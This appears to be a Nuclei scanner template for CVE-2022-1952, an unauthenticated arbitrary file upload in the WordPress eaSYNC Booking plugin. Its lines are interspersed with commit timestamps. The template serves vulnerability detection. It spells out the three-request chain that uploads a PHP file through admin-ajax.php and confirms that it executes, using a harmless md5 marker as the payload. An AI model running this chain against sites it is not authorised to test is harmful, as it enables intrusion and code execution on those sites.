2022-10-29 11:20:01 +00:00
id : CVE-2022-1952
info :
2023-04-07 15:29:08 +00:00
name : WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
2022-10-29 11:20:01 +00:00
author : theamanrawat
severity : critical
description : |
2023-04-07 15:29:08 +00:00
WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
2022-10-29 11:20:01 +00:00
reference :
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
- https://wordpress.org/plugins/easync-booking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
classification :
2022-11-11 20:30:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-10-29 11:20:01 +00:00
cve-id : CVE-2022-1952
2022-11-11 20:30:02 +00:00
cwe-id : CWE-434
2023-10-29 11:57:59 +00:00
epss-score : 0.95415
2023-11-23 06:31:41 +00:00
epss-percentile : 0.99182
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
2022-10-29 11:20:01 +00:00
metadata :
2022-11-12 07:18:56 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : syntactics
product : free_booking_plugin_for_hotels\,_restaurant_and_car_rental
2023-09-06 11:59:08 +00:00
framework : wordpress
2022-11-12 07:18:56 +00:00
tags : cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive
2022-10-29 11:20:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-29 11:20:01 +00:00
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Cookie : PHPSESSID=a0d5959357e474aef655313f69891f37
Content-Type : multipart/form-data; boundary=------------------------98efee55508c5059
--------------------------98efee55508c5059
Content-Disposition : form-data; name="action"
easync_session_store
--------------------------98efee55508c5059
Content-Disposition : form-data; name="type"
car
--------------------------98efee55508c5059
Content-Disposition : form-data; name="with_driver"
self-driven
--------------------------98efee55508c5059
2022-11-11 20:13:12 +00:00
Content-Disposition : form-data; name="driver_license_image2"; filename="{{randstr}}.php"
2022-10-29 11:20:01 +00:00
Content-Type : application/octet-stream
2022-11-04 07:07:38 +00:00
<?php echo md5('CVE-2022-1952');?>
2022-10-29 11:20:01 +00:00
--------------------------98efee55508c5059--
- |
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
Host : {{Hostname}}
Cookie : PHPSESSID=a0d5959357e474aef655313f69891f37
- |
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- contains(header_3, "text/html")
2022-10-29 11:20:01 +00:00
- status_code_3 == 200
2022-11-04 07:07:38 +00:00
- contains(body_1, 'success\":true')
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
2022-10-29 11:20:01 +00:00
condition : and
extractors :
- type : regex
name : filename
group : 1
regex :
2022-11-04 07:07:38 +00:00
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
internal : true
2023-11-27 09:19:41 +00:00
# digest: 4b0a00483046022100eb00042a178da8dec3c042b331bf61aa8b7f34821705bac96f5c0684e50ee30e0221009967f56d88197dd3d4ba72f86c5d4ca682c5ba950c592e30e56aaf9718749a64:922c64590222798bb761d5b6d8e72950